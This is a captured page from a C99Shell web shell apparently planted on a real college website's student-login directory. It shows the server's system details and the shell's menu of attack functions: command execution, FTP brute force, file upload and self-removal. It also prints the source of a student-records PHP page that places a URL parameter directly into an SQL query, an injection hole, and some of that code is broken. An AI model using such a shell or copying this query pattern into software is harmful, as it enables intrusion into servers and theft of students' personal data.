!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.24.0. PHP/7.3.32 

uname -a: Linux ip-172-31-28-255.ec2.internal 6.1.159-181.297.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC
Mon Dec 22 22:31:59 UTC 2025 x86_64
 

 

Safe-mode: OFF (not secure)

/www/wwwroot/itce.co.in/studentlogin/   drwxr-xr-x
Free 30.76 GB of 49.93 GB (61.62%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     view.php (1.41 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
mysql_connect
("localhost");
mysql_select_db("test") or 
die(
"database could not connect
"
);
?>
<html>
<head>
<meta name="description"
content="Php Code for View,
Search, Edit and Delete
Record" />
<meta http-equiv="Content-
Type" content="text/html;
charset=iso-8859-1" />
<title>View Student
Record</title>
</head>
<body>
<center><h1><u>Student Database</u></h1></center>
<?
$roll
=$_GET["roll"];
$query="select * from student where roll='$roll'";
$result=mysql_query($query);
while (
$row mysql_fetch_array($result)) {
 
?>
<table style=" border:1px solid silver" cellpadding="5px" cellspacing="0px"
align="center" border="1">
<tr>
<td colspan="4" style="background:#0066FF; color:#FFFFFF; font-size:20px">VIEW
STUDENT DATABASE</td></tr>
<tr>
<td> Roll Number</td><td><? echo $row[0];?></td>
<td> Class</td><td><? echo $row[1];?></td>
</tr>
<tr>
<td> Name of Student</td><td><? echo $row[2];?></td>
<td> Father's Name</td><td><? echo $row[3];?></td>
</tr>
<tr>
<td>Sex</td><td><? echo $row[4];?></td>
<td>Address1</td><td><? echo $row[5];?></td></tr>
<tr>
<td>Address2</td><td><? echo $row[6];?></td>
<td>Address3</td><td><? echo $row[7];?></td></tr>
<tr>
<td>City</td><td><? echo $row[8];?></td>
<td>Phone</td><td><? echo $row[9];?></td></tr>
<tr>
<td>Email</td><td><? echo $row[10];?></td>
<td>Remarks</td><td><? echo $row[11];?></td></tr>
<tr>
</table>
<?
}
?>
<p align="center"><a href="index.php">Go Back to Home</a></p>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0017 ]--